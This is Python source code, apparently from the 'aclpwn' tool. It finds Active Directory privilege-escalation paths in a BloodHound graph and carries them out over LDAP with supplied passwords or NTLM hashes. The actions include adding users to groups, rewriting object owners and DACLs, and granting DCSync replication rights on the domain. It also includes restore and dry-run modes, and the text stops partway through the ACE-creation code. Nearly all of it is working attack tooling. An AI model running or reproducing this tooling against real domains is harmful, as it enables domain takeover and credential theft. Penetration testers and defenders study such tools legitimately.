from __future__ import unicode_literals, print_function
import json
import codecs
import binascii
import getpass
import traceback
import ldap3
import sys
from aclpwn.utils import ldap2domain, get_sam_name, get_domain
from impacket.ldap import ldaptypes
from impacket.uuid import string_to_bin, bin_to_string
from impacket.ldap.ldaptypes import ACCESS_ALLOWED_OBJECT_ACE, LDAP_SID
from ldap3.utils.conv import escape_filter_chars
from ldap3.protocol.microsoft import security_descriptor_control
from ldap3 import BASE
from pprint import pprint

def print_m(string):
    sys.stderr.write('\033[94m[-]\033[0m %s\n' % (string))

def print_o(string):
    sys.stderr.write('\033[92m[+]\033[0m %s\n' % (string))

def print_f(string):
    sys.stderr.write('\033[91m[!]\033[0m %s\n' % (string))

class RestoreException(Exception):
    pass

class RestoreOperation(object):

    def __init__(self, args, restorefile):
        self.args = args
        self.restorefile = restorefile
        self.ldapconnection = None
        self.contextuser = None
        self.passdata = {}
        with codecs.open(restorefile, 'r', 'utf-8') as infile:
            data = json.load(infile)
            try:
                self.config = data['config']
                self.history = data['history']
            except KeyError:
                print_f('JSON is invalid! Not all required fields are present.')

    def establish_connection(self, user):
        domain = self.config['domain']
        # First check if the server was specified explicitly
        if self.args.server:
            server = self.args.server
        # If not, check if the server was specified in the restore data
        elif self.config['server']:
            server = self.config['server']
        # Else, assume DNS is set up properly and we can connect to the domain
        else:
            server = self.config['domain']

        # Todo: get password from command line args
        try:
            password = self.passdata[user]
        except KeyError:
            prompt = 'Please supply the password or LM:NTLM hashes for the account %s: ' % user
            password = getpass.getpass(prompt.encode('utf-8'))
            # Store for further reference
            self.passdata[user] = password

        if domain is None:
            domain = get_domain(user)
        if '@' in user or '.' in user:
            binduser = get_sam_name(user)
        else:
            binduser = user

        ldapserver = ldap3.Server(server, get_info=ldap3.DSA)
        connection = ldap3.Connection(ldapserver, user='%s\\%s' % (domain, binduser), password=password, authentication=ldap3.NTLM)
        if not connection.bind():
            raise RestoreException('Failed to connect to the LDAP server as %s\\%s: %s' % (domain, binduser, str(connection.result)))
        return connection, user

    def rebind_ldap(self, user):
        domain = self.config['domain']

        # Todo: get password from command line args
        try:
            password = self.passdata[user]
        except KeyError:
            prompt = 'Please supply the password or LM:NTLM hashes for the account %s: ' % user
            password = getpass.getpass(prompt.encode('utf-8'))
            # Store for further reference
            self.passdata[user] = password

        if domain is None:
            domain = get_domain(user)
        if '@' in user or '.' in user:
            binduser = get_sam_name(user)
        else:
            binduser = user

        if not self.ldapconnection.rebind('%s\\%s' % (domain, binduser), password, authentication=ldap3.NTLM):
            raise RestoreException('Failed to switch context to %s\\%s: %s' % (domain, binduser, str(self.ldapconnection.result)))

        return user



    def run(self):
        task_map = {
            "add_addmember_privs": RestoreOperation.remove_addmember_privs,
            "add_user_to_group": RestoreOperation.remove_user_from_group,
            "add_domain_sync": RestoreOperation.remove_domain_sync,
            "write_owner": RestoreOperation.remove_owner,
        }
        for task in reversed(self.history):
            taskname = task['operation']
            data = task['data']
            if not data['success']:
                # Skip this task
                print_m('Task %s was not successful, and will be ignored for restore mode', taskname)
                continue
            if not self.ldapconnection:
                self.ldapconnection, self.contextuser = self.establish_connection(task['contextuser'])
            elif self.contextuser != task['contextuser']:
                self.contextuser = self.rebind_ldap(task['contextuser'])
            try:
                restoreop = task_map[taskname]
            except KeyError:
                raise RestoreException('Unsupported restore operation: %s' % restoreop)
            try:
                restoreop(self.ldapconnection, data)
            except RestoreException:
                print_f('Error while running restore operation:')
                # Just show exception for now
                traceback.print_exc()
                if input('Continue? [y/N] ').upper() != 'Y':
                    return

    @staticmethod
    def dacl_remove_ace(secdesc, guid, usersid, accesstype):
        to_remove = None
        binguid = string_to_bin(guid)
        for ace in secdesc['Dacl'].aces:
            sid = ace['Ace']['Sid'].formatCanonical()
            # Is it the correct ACE type?
            if ace['AceType'] != ACCESS_ALLOWED_OBJECT_ACE.ACE_TYPE:
                continue
            # Is it the correct SID?
            if sid != usersid:
                continue
            # Does it apply to the correct property?
            if ace['Ace']['ObjectType'] != binguid:
                continue
            # Does it have the correct mask?
            if ace['Ace']['Mask']['Mask'] != accesstype:
                continue
            # We are still here -> this is the correct ACE
            to_remove = ace
            break

        if to_remove:
            # Found! Remove
            secdesc['Dacl'].aces.remove(to_remove)
            return True
        else:
            # Not found
            return False


    @staticmethod
    def remove_addmember_privs(ldapconnection, data):
        # Set SD flags to only query for DACL
        controls = security_descriptor_control(sdflags=0x04)
        usersid = data['target_sid']

        ldapconnection.search(data['target_dn'], '(objectClass=*)', search_scope=BASE, attributes=['SAMAccountName','nTSecurityDescriptor'], controls=controls)
        entry = ldapconnection.entries[0]

        secDescData = entry['nTSecurityDescriptor'].raw_values[0]
        secDesc = ldaptypes.SR_SECURITY_DESCRIPTOR(data=secDescData)

        old_sd = binascii.unhexlify(data['old_sd'])
        if secDescData == old_sd:
            print_m('%s security descriptor is identical to before operation, skipping' % data['target_dn'])
            return True

        new_sd = binascii.unhexlify(data['new_sd'])
        if secDescData != new_sd:
            # Manual operation
            accesstype = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_WRITE_PROP
            if RestoreOperation.dacl_remove_ace(secDesc, 'bf9679c0-0de6-11d0-a285-00aa003049e2', usersid, accesstype):
                print_m('Removing ACE using manual approach')
                replace_sd = secDesc.getData()
            else:
                raise RestoreException('%s security descriptor does not contain the modified ACE. The access may already be restored.' % data['target_dn'])
        else:
            # We can simply restore the old SD since the current SD is identical to the one after our modification
            print_m('Removing ACE using SD restore approach')
            replace_sd = old_sd

        res = ldapconnection.modify(data['target_dn'], {'nTSecurityDescriptor':(ldap3.MODIFY_REPLACE, [replace_sd])}, controls=controls)
        if res:
            print_o('AddMember privileges restored successfully')
            return True
        else:
            raise RestoreException('Failed to restore WriteMember privs on group %s: %s' % (data['target_dn'], str(ldapconnection.result)))

    @staticmethod
    def remove_user_from_group(ldapconnection, data):
        group_dn = data['group_dn']
        user_dn = data['user_dn']

        # Now add the user as a member to this group
        res = ldapconnection.modify(group_dn, {
            'member': [(ldap3.MODIFY_DELETE, [user_dn])]
        })
        if res:
            print_o('Removed membership of %s from %s' % (user_dn, group_dn))
            return True
        else:
            # Unwilling to perform result means we aren't a member
            if ldapconnection.result['result'] == 53:
                print_m('Could not remove %s from group %s since they are not a member, your restore data may be out of date, continuing anyway!' % (user_dn, group_dn))
                # Treat this as a success
                return True
            raise RestoreException('Failed to remove %s from group %s: %s' % (user_dn, group_dn, str(ldapconnection.result)))


    @staticmethod
    def remove_domain_sync(ldapconnection, data):
        # Set SD flags to only query for DACL
        controls = security_descriptor_control(sdflags=0x04)
        usersid = data['target_sid']

        ldapconnection.search(data['target_dn'], '(objectClass=*)', search_scope=BASE, attributes=['SAMAccountName','nTSecurityDescriptor'], controls=controls)

        entry = ldapconnection.entries[0]
        secDescData = entry['nTSecurityDescriptor'].raw_values[0]
        secDesc = ldaptypes.SR_SECURITY_DESCRIPTOR(data=secDescData)

        old_sd = binascii.unhexlify(data['old_sd'])
        if secDescData == old_sd:
            print_m('%s security descriptor is identical to before operation, skipping' % data['target_dn'])
            return True

        new_sd = binascii.unhexlify(data['new_sd'])
        if secDescData != new_sd:
            accesstype = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_CONTROL_ACCESS
            # these are the GUIDs of the get-changes and get-changes-all extended attributes
            if RestoreOperation.dacl_remove_ace(secDesc, '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2', usersid, accesstype) and \
               RestoreOperation.dacl_remove_ace(secDesc, '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2', usersid, accesstype):
                print_m('Removing ACE using manual approach')
                replace_sd = secDesc.getData()
            else:
                raise RestoreException('%s security descriptor does not contain the modified ACE. The access may already be restored.' % data['target_dn'])
        else:
            # We can simply restore the old SD since the current SD is identical to the one after our modification
            print_m('Removing ACE using SD restore approach')
            replace_sd = old_sd

        res = ldapconnection.modify(data['target_dn'], {'nTSecurityDescriptor':(ldap3.MODIFY_REPLACE, [replace_sd])}, controls=controls)
        if res:
            print_o('Domain Sync privileges restored successfully')
            return True
        else:
            raise RestoreException('Failed to restore Domain sync privs on domain %s: %s' % (data['target_dn'], str(ldapconnection.result)))


    @staticmethod
    def remove_owner(ldapconnection, data):
        # Set SD flags to only query for owner
        controls = security_descriptor_control(sdflags=0x01)
        usersid = data['old_owner_sid']

        ldapconnection.search(data['target_dn'], '(objectClass=*)', search_scope=BASE, attributes=['SAMAccountName','nTSecurityDescriptor'], controls=controls)
        entry = ldapconnection.entries[0]

        secDescData = entry['nTSecurityDescriptor'].raw_values[0]
        secDesc = ldaptypes.SR_SECURITY_DESCRIPTOR(data=secDescData)
        if secDesc['OwnerSid'].formatCanonical() == usersid:
            print_m('%s is owned by the same user as before exploitation, skipping' % data['target_dn'])
            return True
        secDesc['OwnerSid'] = LDAP_SID()
        secDesc['OwnerSid'].fromCanonical(usersid)

        secdesc_data = secDesc.getData()
        res = ldapconnection.modify(data['target_dn'], {'nTSecurityDescriptor':(ldap3.MODIFY_REPLACE, [secdesc_data])}, controls=controls)
        if res:
            print_o('Owner restore succesful')
            return True
        else:
            # Constraintintersection means we can't change the owner to this SID
            # TODO: investigate why this is and possible workarounds
            if ldapconnection.result['result'] == 19:
                print_f('Failed to change owner of group %s to %s. This is a known limitation, please restore the owner manually.' % (data['target_dn'], usersid))
                # Treat this as a success
                return True
            raise RestoreException('Failed to change owner of group %s to %s: %s' % (data['target_dn'], usersid, str(ldapconnection.result)))



from __future__ import unicode_literals, print_function
from neo4j.v1 import GraphDatabase
import platform
import requests
import json
import os

driver = None
restapi = requests.session()

def init_driver(database, user, password):
    global driver
    uri = "bolt://%s:7687" % database
    driver = GraphDatabase.driver(uri, auth=(user, password))
    restapi.auth = (user, password)
    return driver

def detect_db_config():
    """
    Detect bloodhound config, which is stored in appData.
    OS dependent according to https://electronjs.org/docs/api/app#appgetpathname
    """
    system = platform.system()
    if system == 'Windows':
        try:
            directory = os.environ['APPDATA']
        except KeyError:
            return (None, None)
        config = os.path.join(directory, 'BloodHound', 'config.json')
        try:
            with open(config, 'r') as configfile:
                configdata = json.load(configfile)
        except IOError:
            return (None, None)

    if system == 'Linux':
        try:
            directory = os.environ['XDG_CONFIG_HOME']
        except KeyError:
            try:
                directory = os.path.join(os.environ['HOME'], '.config')
            except KeyError:
                return (None, None)
        config = os.path.join(directory, 'bloodhound', 'config.json')
        try:
            with open(config, 'r') as configfile:
                configdata = json.load(configfile)
        except IOError:
            return (None, None)

    if system == 'Darwin':
        try:
            directory = os.path.join(os.environ['HOME'], 'Library', 'Application Support')
        except KeyError:
            return (None, None)
        config = os.path.join(directory, 'bloodhound', 'config.json')
        try:
            with open(config, 'r') as configfile:
                configdata = json.load(configfile)
        except IOError:
            return (None, None)

    # If we are still here, we apparently found the config :)
    try:
        username = configdata['databaseInfo']['user']
    except KeyError:
        username = 'neo4j'
    try:
        password = configdata['databaseInfo']['password']
    except KeyError:
        password = None
    return username, password

def close_driver():
    global driver
    driver.close()

preparequeries = [
    "MATCH (n)-[r:MemberOf]->(m:Group) SET r.aclpwncost = 0",
    "MATCH (n)-[r:AddMember|GenericAll|GenericWrite|AllExtendedRights]->(m:Group) SET r.aclpwncost = 1",
    "MATCH (n)-[r:WriteOwner]->(m:Group) SET r.aclpwncost = 3",
    "MATCH (n)-[r:WriteDacl|Owns]->(m:Group) SET r.aclpwncost = 2",
    # These privileges on user objects are not wanted since they work only when resetting passwords
    "MATCH (n)-[r:WriteDacl|Owns|WriteOwner|GenericAll|GenericWrite|ForceChangePassword|AllExtendedRights]->(m:User) SET r.aclpwncost = 200",
    "MATCH (n)-[r:WriteDacl]->(m:Domain) SET r.aclpwncost = 1",
    "MATCH (n)-[r:DCSync|GetChangesAll|AllExtendedRights]->(m:Domain) SET r.aclpwncost = 0",
]

def preparedb():
    global driver
    with driver.session() as session:
        with session.begin_transaction() as tx:
            for query in preparequeries:
                tx.run(query)


from aclpwn import utils, database

# Cost map for relationships
costmap = {
    'MemberOf': 0,
    'AddMember': 1,
    'GenericAll': 1,
    'GenericWrite': 1,
    'WriteOwner': 3,
    'WriteDacl': 2,
    'DCSync': 0,
    'Owns': 2,
    'GetChangesAll': 0,
    'GetChanges': 0,
    'AllExtendedRights': 2
}



def dijkstra_find(fromid, toid, dbhost):
    # This is "documented" here
    # https://github.com/neo4j/neo4j/blob/3.3/community/server/src/main/java/org/neo4j/server/rest/web/DatabaseActions.java
    # https://github.com/neo4j/neo4j/blob/3.3/community/server/src/main/java/org/neo4j/server/domain/RelationshipExpanderBuilder.java
    rellist = [{"type": rel, "direction": "out"} for rel in costmap.keys()]
    data = {
      "to" : "http://%s:7474/db/data/node/%s" % (dbhost, toid),
      "max_depth" : 100,
      "relationships" : rellist,
      "algorithm" : "dijkstra",
      "cost_property": "aclpwncost",
      "default_cost": 1
    }
    resp = database.restapi.post('http://%s:7474/db/data/node/%s/paths' % (dbhost, fromid), json=data)
    data = resp.json()
    paths = []
    for path in data:
        nodes, rels = resolve_rest_path(path)
        paths.append((nodes, rels, path))
    return paths

def dijkstra_find_cypher(startnode, endnode, starttype='User', endtype='User'):
    query = "MATCH (n:%s {name: {startnode}}), (m:%s {name: {endnode}}) " \
            "CALL algo.shortestPath.stream(n, m, 'aclpwncost', " \
            "{nodeQuery:null, relationshipQuery:null, defaultValue:200.0, direction:'OUTGOING'}) " \
            "YIELD nodeId, cost " \
            "RETURN nodeId as node, cost"

    with database.driver.session() as session:
        with session.begin_transaction() as tx:
            print(query % (starttype, endtype))
            path = tx.run(query % (starttype, endtype),
                          startnode=startnode,
                          endnode=endnode,
                          property='aclpwncost')
    paths = []
    nodes, rels = resolve_dijkstra_path(path)
    paths.append((nodes, rels, path))
    return paths


queries = {
    # Query all shortest paths
    'shortestonly': "MATCH (n:%s {name: {startnode}}),"
                    "(m:%s {name: {endnode}}),"
                    " p=allShortestPaths((n)-[:MemberOf|AddMember|GenericAll|"
                    "GenericWrite|WriteOwner|WriteDacl|Owns|DCSync|GetChangesAll|AllExtendedRights*1..]->(m))"
                    " RETURN p",
    # Query all simple paths (more expensive query than above)
    # credits to https://stackoverflow.com/a/40062243
    'allsimple':    "MATCH (n:%s {name: {startnode}}),"
                    "(m:%s {name: {endnode}}),"
                    " p=(n)-[:MemberOf|AddMember|GenericAll|"
                    "GenericWrite|WriteOwner|WriteDacl|Owns|DCSync|GetChangesAll|AllExtendedRights*1..]->(m)"
                    "WHERE ALL(x IN NODES(p) WHERE SINGLE(y IN NODES(p) WHERE y = x))"
                    " RETURN p"
}


def get_path(startnode, endnode, starttype='User', endtype='User', querytype='allsimple'):
    with database.driver.session() as session:
        with session.begin_transaction() as tx:
            return tx.run(queries[querytype] % (starttype, endtype),
                          startnode=startnode,
                          endnode=endnode)

def get_path_cost(record):
    nmap = utils.getnodemap(record['p'].nodes)
    cost = 0
    for el in record['p']:
        cost += costmap[el.type]
    return cost

def resolve_dijkstra_path(path):
    nodes = []
    rels = []
    nq = "MATCH (n)-[w {aclpwncost: {cost}}]->(m) WHERE ID(n) = {source} AND ID(m) = {dest} RETURN n,w,m"
    bnq = "MATCH (n)-[w]->(m) WHERE ID(n) = {source} AND ID(m) = {dest} RETURN n,w,m"
    with database.driver.session() as session:
        with session.begin_transaction() as tx:
            pv = path.values()
            for i in range(1, len(pv)):
                res = tx.run(nq, source=pv[i-1][0], cost=pv[i][1]-pv[i-1][1], dest=pv[i][0])
                data = res.single()
                # No result, most likely an invalid path, but query for a relationship with any cost regardless
                if not data:
                    res = tx.run(bnq, source=pv[i-1][0], dest=pv[i][0])
                    data = res.single()
                nodes.append(data['n'])
                rels.append(data['w'])
            # Append the last node
            nodes.append(data['m'])
    return (nodes, rels)

def resolve_rest_path(path):
    nodes = []
    rels = []
    nq = "MATCH (n) WHERE id(n) = {id} RETURN n"
    rq = "MATCH ()-[n]-() WHERE id(n) = {id} RETURN n LIMIT 1"
    with database.driver.session() as session:
        with session.begin_transaction() as tx:
            for nodeurl in path['nodes']:
                nid = nodeurl.split('/')[-1]
                res = tx.run(nq, id=int(nid))
                nodes.append(res.single()['n'])
            for relurl in path['relationships']:
                nid = relurl.split('/')[-1]
                res = tx.run(rq, id=int(nid))
                rels.append(res.single()['n'])
    return (nodes, rels)



from __future__ import print_function

import sys
import argparse
import traceback
import getpass
from aclpwn import utils, pathfinding, database, exploitation
from aclpwn.restore import RestoreOperation

def print_m(string):
    sys.stderr.write('\033[94m[-]\033[0m %s\n' % (string))

def print_o(string):
    sys.stderr.write('\033[92m[+]\033[0m %s\n' % (string))

def print_f(string):
    sys.stderr.write('\033[91m[!]\033[0m %s\n' % (string))

def main():
    parser = argparse.ArgumentParser(description='Exploit ACL escalation paths via BloodHound')
    parser._optionals.title = "Main options"
    parser._positionals.title = "Required options"

    #Main parameters
    maingroup = parser.add_argument_group("aclpwn options")
    maingroup.add_argument("-f","--from", type=str, metavar='SOURCE', help="Source object to start the path (usually a user). Example: user@domain.local")
    maingroup.add_argument("-ft","--from-type", default="User", type=str, metavar='TYPE', help="Type of the source object. Valid values: User/Group/Domain/Computer. Default: user")
    maingroup.add_argument("-t","--to", type=str, default='', metavar='DESTINATION', help="Target object to escalate to (for example a group/domain). Example: computer.domain.local or domain.local")
    maingroup.add_argument("-tt","--to-type", default="Domain", type=str, metavar='TYPE', help="Type of the destination object. Valid values: User/Group/Domain/Computer. Default: domain")
    maingroup.add_argument("-d","--domain", type=str, metavar='DOMAIN', help="The domain to escalate in. If unspecified, you have to provide them in the from/to parameters.")
    maingroup.add_argument("-a","--algorithm", type=str, default='dijkstra', choices=['dijkstra', 'shortestonly', 'allsimple', 'dijkstra-cypher'], metavar='ALGORITHM', help="Path algorithm to use. Options: shortestonly/dijkstra/dijkstra-cypher/allsimple. For a description, see https://url.link. Default: dijkstra")
    maingroup.add_argument("-r","--restore", type=str, metavar='FILE', help="Load an aclpwn restore file to revert changes made.")

    #DB parameters
    databasegroup = parser.add_argument_group("Database options (if unspecified they will be taken from your BloodHound config)")
    databasegroup.add_argument("--database", type=str, metavar="DATABASE HOST", default="localhost", help="The host neo4j is running on. Default: localhost. Note that aclpwn uses both the REST API and the Bolt driver.")
    databasegroup.add_argument("-du", "--database-user", type=str, metavar="USERNAME", default="neo4j", help="Neo4j username to use")
    databasegroup.add_argument("-dp", "--database-password", type=str, metavar="PASSWORD", help="Neo4j password to use")
    databasegroup.add_argument("--no-prepare", action='store_true', help="Don't prepare the database when using Dijkstra. Only use this when you haven't modified the DB since running aclpwn a previous time.")

    #Exploitation parameters
    databasegroup = parser.add_argument_group("Exploitation options")
    databasegroup.add_argument("-s", "--server", type=str, metavar="SERVER", help="Server to connect to. If not specified, it will be taken from the domain.")
    databasegroup.add_argument("-u", "--user", type=str, metavar="USERNAME", help="User to use for exploitation. If not specified, the source user specified with --from will be used.")
    databasegroup.add_argument("-p", "--password", type=str, metavar="PASSWORD", help="Password or LMHASH:NTHASH used for exploitation.")
    databasegroup.add_argument("-sp", "--source-password", metavar="PASSWORD", help="Password or LMHASH:NTHASH for the source user (used in first step of the exploit chain)")
    databasegroup.add_argument("-dry", "--dry-run", action='store_true', help="Don't actually perform any attacks, only show what would happen.")


    validtypes = ['User', 'Group', 'Domain', 'Computer']
    args = parser.parse_args()
    # Since we deal with some reserved keywords, we use a dictionary too
    argsdict = vars(args)

    if args.restore:
        # Switch to restore mode
        restorer = RestoreOperation(args, args.restore)
        restorer.run()
        return

    if args.from_type.capitalize() not in validtypes:
        print_f('Error: --from-type unrecognized type. Valid types: %s' % ', '.join(validtypes))
        return

    if args.to_type.capitalize() not in validtypes:
        print_f('Error: --to-type unrecognized type. Valid types: %s' % ', '.join(validtypes))
        return

    if args.database_password is None:
        args.database_user, args.database_password = database.detect_db_config()
        if args.database_password is None:
            print_f('Error: Could not autodetect the Neo4j database credentials from your BloodHound config. Please specify them manually')
            return

    if not args.dry_run:
        if args.domain is None and args.server is None:
            print_f('Error: You must specify an LDAP server to connect to with --server, or supply a domain which resolves to this server with --domain, unless you are simulating exploitation with --dry-run')
            return
        if args.source_password is None:
            args.source_password = getpass.getpass('Please supply the password or LM:NTLM hashes of the account you are escalating from: ')

    if args.domain:
        from_object = utils.append_domain(argsdict['from'].upper(), args.from_type.capitalize(), args.domain.upper())
        to_object = utils.append_domain(argsdict['to'].upper(), args.to_type.capitalize(), args.domain.upper())
    else:
        from_object = argsdict['from'].upper()
        to_object = argsdict['to'].upper()

    # We edit this on the args directly
    args.from_object = from_object
    args.to_object = to_object

    database.init_driver(args.database, args.database_user, args.database_password)

    try:
        if args.algorithm == 'dijkstra' or args.algorithm == 'dijkstra-cypher':
            if not args.no_prepare:
                database.preparedb()

            # Split logic for dijkstra via REST and via Cypher only
            if args.algorithm == 'dijkstra-cypher':
                # Cypher can use the nodes directly
                paths = pathfinding.dijkstra_find_cypher(from_object, to_object, args.from_type.capitalize(), args.to_type.capitalize())
            else:
                # First we need to obtain the node IDs for use with the REST api
                q = "MATCH (n:%s {name: {name}}) RETURN n"
                with database.driver.session() as session:
                    fromres = session.run(q % args.from_type.capitalize(), name=from_object)
                    try:
                        fromid = fromres.single()['n'].id
                    except TypeError:
                        print_f('No %s found with the name %s in the database' % (args.from_type.capitalize(), from_object))
                        return
                    tores = session.run(q % args.to_type.capitalize(), name=to_object)
                    try:
                        toid = tores.single()['n'].id
                    except TypeError:
                        print_f('No %s found with the name %s in the database' % (args.to_type.capitalize(), to_object))
                        return
                paths = pathfinding.dijkstra_find(fromid, toid, args.database)

            if len(paths) == 0:
                print_f('No path found!')
                return

            # Validate the paths (check if all operations are supported)
            i = 0
            validpaths = []
            for nodes, rels, path in paths:
                # Try to build the exploit path first
                exploitpath = utils.build_rest_path(nodes, rels)
                # Test if we support all operations of this path
                if not exploitation.test_path(exploitpath):
                    print_m('Invalid path, skipping')
                    continue
                # If we do, print it
                print_o('Path found!')
                if len(paths) > 1:
                    print('Path [%d]: ' % i, end='')
                    i += 1
                else:
                    print('Path: ', end='')
                print(utils.print_rest_path(nodes, rels))
                validpaths.append(exploitpath)

            # Are there any paths left?
            if len(validpaths) == 0:
                print_f('The found path is not supported, quitting.')
                return

            # If there is more than 1 path, offer a choice
            if len(validpaths) > 1:
                pathi = utils.prompt_path(len(validpaths))
                if pathi is False or pathi is None:
                    return
                exploitpath = validpaths[pathi]
            else:
                exploitpath = validpaths[0]
        else:
            records = pathfinding.get_path(from_object, to_object, args.from_type.capitalize(), args.to_type.capitalize(), args.algorithm)

            paths = []
            minpathcost = 1000
            exploitpath = None
            i = 0
            for path in records:
                if path is None:
                    print_f('No path found!')
                else:
                    if len(paths) == 0:
                        print_o('Path found!')
                    pdata = utils.build_path(path)
                    # Test if we support all operations of this path
                    if not exploitation.test_path(pdata):
                        continue
                    print('Path [%d]: ' % i, end='')
                    i += 1
                    print(utils.print_path(path))
                    paths.append(pdata)
                    pathcost = pathfinding.get_path_cost(path)
                    print_m('Path cost: %d' % pathcost)

                    # Find the cheapest path
                    if pathcost < minpathcost:
                        exploitpath = pdata
                        minpathcost = pathcost

            if len(paths) == 0:
                print_f('No path found!')
                return

            if len(paths) > 1:
                pathi = utils.prompt_path(len(paths))
                if pathi is False or pathi is None:
                    return
                exploitpath = paths[pathi]
            else:
                exploitpath = paths[0]

        # The above operations get the correct path, now we unify the flow to exploit it
        exploitdata = exploitation.walk_path(exploitpath, args, None, args.dry_run)
        if not exploitdata:
            return False

        # Unpack
        task_queue, state = exploitdata
        if args.dry_run:
            print_o('Path validated, the following modifications are required for exploitation in the current configuration:')
        try:
            # Actually perform operations
            exploitation.run_tasks(task_queue, args.dry_run)
        except exploitation.ExploitException:
            print_f('Error while running exploitation path')
            traceback.print_exc()
            # Write restore data for all complete operations
            state.save_restore_data()
            return
        if not args.dry_run:
            print_o('Finished running tasks')
            # At this point it should be done, write restore data
            state.save_restore_data()

    finally:
        database.close_driver()
    return

if __name__ == '__main__':
    main()



import re
from builtins import input
def getnodemap(nodes):
    mymap = {}
    for node in nodes:
        mymap[node.id] = node
    return mymap

def print_path(record):
    nmap = getnodemap(record['p'].nodes)
    # Iterate the path
    pathtext = '(%s)-' % record['p'].nodes[0].get('name')
    for el in record['p']:
        pathtext += '[%s]->(%s)-' % (el.type, nmap[el.end].get('name'))
    pathtext = pathtext[:-1]
    return pathtext

def build_path(record):
    path = []
    nmap = getnodemap(record['p'].nodes)
    # Iterate the path
    for el in record['p']:
        path.append((el, nmap[el.end]))
    return path

def build_rest_path(nodes, rels):
    path = []
    nmap = getnodemap(nodes)
    # Iterate the path
    pathtext = '(%s)-' % nodes[0].get('name')
    for i, el in enumerate(nodes[1:]):
        path.append((rels[i], el))
    return path

def print_rest_path(nodes, rels):
    nmap = getnodemap(nodes)
    # Iterate the path
    pathtext = '(%s)-' % nodes[0].get('name')
    for i, el in enumerate(nodes[1:]):
        pathtext += '[%s]->(%s)-' % (rels[i].type, el.get('name'))
    pathtext = pathtext[:-1]
    return pathtext

def get_modify_length(record):
    return len([el for el in record['p'] if el.get('isacl', False)])

def append_domain(name, otype, domain):
    """
    Append the domain to a name, depending on its type. If the name already is in domain
    specification, return it as-is
    """
    if otype == 'Domain':
        if name == '':
            return domain.upper()
    elif otype == 'Computer':
        if not '.' in name:
            # Computers use a dot as separator
            return '%s.%s' % (name, domain)
    elif otype == 'User':
        if not '@' in name:
            # Users use an @ as separator
            return '%s@%s' % (name, domain)
    elif otype == 'Group':
        if not '@' in name:
            # Groups use an @ as separator
            return '%s@%s' % (name, domain)
    # Default: return name as-is
    return name

# Ask the user to choose a path
def prompt_path(pathlen):
    chosen = False
    path = None
    while not chosen:
        try:
            pathstr = input('Please choose a path [0-%d] ' % (pathlen-1))
            path = int(pathstr)
        except ValueError:
            print('Invalid path specified!')
        except KeyboardInterrupt:
            print()
            return False
        if path is None:
            continue
        if path >= 0 and path < pathlen:
            chosen = True
        else:
            print('Invalid path specified!')
    return path

def domain2ldap(domain):
    return 'DC=' + ',DC='.join(str(domain).rstrip('.').split('.'))

def ldap2domain(ldap):
    return re.sub(',DC=', '.', ldap[ldap.find('DC='):], flags=re.I)[3:]

# Get SAM name from bloodhound name (user/group/computer)
def get_sam_name(fullname):
    if not '@' in fullname and '.' in fullname:
        # Computer account.  Format: computer.domain.local
        # also append the $ sign used for computer accounts
        return fullname.split('.', 1)[0]+'$'
    else:
        # User or group
        return fullname.rsplit('@', 1)[0]

# Get domain from bloodhound name (user/group/computer)
def get_domain(fullname):
    if not '@' in fullname and '.' in fullname:
        # Computer account. Format: computer.domain.local
        return fullname.split('.', 1)[1]
    else:
        # Group or user. Format: group@domain.local
        return fullname.rsplit('@', 1)[1]



import sys
import binascii
import datetime
import codecs
import json
import getpass
import ldap3
from ldap3.utils.conv import escape_filter_chars
from ldap3.protocol.microsoft import security_descriptor_control
from impacket.ldap import ldaptypes
from impacket.uuid import string_to_bin, bin_to_string
from impacket.ldap.ldaptypes import ACCESS_ALLOWED_OBJECT_ACE, ACCESS_MASK, ACCESS_ALLOWED_ACE, ACE, OBJECTTYPE_GUID_MAP, LDAP_SID
from aclpwn.utils import ldap2domain, get_sam_name, get_domain

def print_m(string):
    sys.stderr.write('\033[94m[-]\033[0m %s\n' % (string))

def print_o(string):
    sys.stderr.write('\033[92m[+]\033[0m %s\n' % (string))

def print_f(string):
    sys.stderr.write('\033[91m[!]\033[0m %s\n' % (string))

class ExploitException(Exception):
    pass

class ExploitState(object):
    """
    Object that stores the current exploitation state.
    Gets passed around through the different tasks
    """

    def __init__(self, connection, contextuser, targetuser, config):
        self.connection = connection
        self.contextuser = contextuser
        self.config = config
        self.confdict = vars(config)
        self.targetuser = targetuser
        self.history = []

    def perform_rebind(self):
        self.contextuser = perform_rebind(self.connection, self.contextuser, self.config, self.confdict)

    def push_history(self, operation, data):
        self.history.append({'operation': operation, 'data': data, 'contextuser': self.contextuser})

    def save_restore_data(self):
        if not self.history:
            return
        now = datetime.datetime.now()
        filename = 'aclpwn-%s.restore' % now.strftime("%Y%m%d-%H%M%S")

        # Copy so we can safely edit properties
        configcopy = self.confdict.copy()

        # Remove potential passwords from here
        configcopy['source_password'] = None
        configcopy['password'] = None

        # Combine in a single object
        outdata = {'config': configcopy, 'history': self.history}

        # Save the json to file
        with codecs.open(filename, 'w', 'utf-8') as outfile:
            json.dump(outdata, outfile)
        print_o('Saved restore state to %s' % filename)

class ExploitTask(object):
    """
    A single task, used for nicer error handling
    """

    def __init__(self, state, fname, target, perform_rebind=False, additional_args=None):
        self.state = state
        self.fname = fname
        self.target = target
        self.perform_rebind = perform_rebind
        self.additional_args = additional_args

    def call(self):
        if self.additional_args:
            self.fname(self.state.connection, self.state, self.state.targetuser, self.target, **self.additional_args)
        else:
            self.fname(self.state.connection, self.state, self.state.targetuser, self.target)
        if self.perform_rebind:
            self.state.perform_rebind()

class MessageTask(object):
    """
    Simple task with an API similar to ExploitTask, but just
    to print a message indicating progress.
    """
    def __init__(self, mfunc, message):
        self.mfunc = mfunc
        self.message = message

    def call(self):
        self.mfunc(self.message)

# Create an object ACE with the specified privguid and our sid
# accesstype should be specified as either a write property flag or access control (for extended attributes)
def create_object_ace(privguid, sid, accesstype):
    nace = ldaptypes.ACE()
    nace['AceType'] = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ACE_TYPE
    nace['AceFlags'] = 0x00
    acedata = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE()
    acedata['Mask'] = ldaptypes.ACCESS_MASK()
    acedata['Mask']['Mask'] = accesstype
    acedata['ObjectType'] = string_to_bin(privguid)
    acedata['InheritedObjectType'] = b''
    acedata['Sid'] = ldaptypes.LDAP_SID()
    acedata['Sid'].fromCanonical(sid)
